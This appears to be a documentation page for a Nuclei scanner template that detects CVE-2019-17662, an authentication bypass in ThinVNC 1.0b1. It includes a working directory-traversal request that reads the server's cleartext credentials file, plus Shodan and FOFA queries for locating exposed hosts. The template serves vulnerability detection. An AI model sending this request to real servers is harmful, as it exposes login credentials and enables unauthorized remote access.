ThinVNC 1.0b1 - Authentication Bypass
ID: CVE-2019-17662
Severity: critical
Author: DhiyaneshDK
Tags: cve,cve2019,packetstorm,auth-bypass,thinvnc,intrusive,cybelsoft
Description
Section titled “Description”ThinVNC 1.0b1 is vulnerable to arbitrary file read, which leads to a compromise of the VNC server. The vulnerability exists even when authentication is turned on during the deployment of the VNC server. The password for authentication is stored in cleartext in a file that can be read via a ../../ThinVnc.ini directory traversal attack vector.
YAML Source
Section titled “YAML Source”id: CVE-2019-17662
info: name: ThinVNC 1.0b1 - Authentication Bypass author: DhiyaneshDK severity: critical description: | ThinVNC 1.0b1 is vulnerable to arbitrary file read, which leads to a compromise of the VNC server. The vulnerability exists even when authentication is turned on during the deployment of the VNC server. The password for authentication is stored in cleartext in a file that can be read via a ../../ThinVnc.ini directory traversal attack vector. impact: | An attacker can bypass authentication and gain unauthorized access to the ThinVNC application. remediation: | Upgrade to a patched version of ThinVNC or implement additional authentication mechanisms. reference: - http://packetstormsecurity.com/files/154896/ThinVNC-1.0b1-Authentication-Bypass.html - https://github.com/bewest/thinvnc/issues/5 - https://redteamzone.com/ThinVNC/ - https://github.com/shashankmangal2/Exploits/blob/master/ThinVNC-RemoteAccess/POC.py - https://github.com/YIXINSHUWU/Penetration_Testing_POC classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2019-17662 cwe-id: CWE-22 epss-score: 0.64941 epss-percentile: 0.97813 cpe: cpe:2.3:a:cybelsoft:thinvnc:1.0:b1:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: cybelsoft product: thinvnc shodan-query: http.favicon.hash:-1414548363 fofa-query: icon_hash=-1414548363 tags: cve,cve2019,packetstorm,auth-bypass,thinvnc,intrusive,cybelsoft
http: - raw: - | GET /{{randstr}}/../../ThinVnc.ini HTTP/1.1 Host: {{Hostname}}
matchers-condition: and matchers: - type: word part: body words: - "User=" - "Password=" condition: and
- type: word part: header words: - "application/binary"
- type: status status: - 200# digest: 4b0a00483046022100a0fdab31acdb5367a1c965256bf6c70f4eee421ef57eeddae5d1ec81b5062ae8022100e8d1ae53452e3a55b6182bffa602dfa6bfe4ca95463e3696dca964838270cbd0:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2019/CVE-2019-17662.yaml"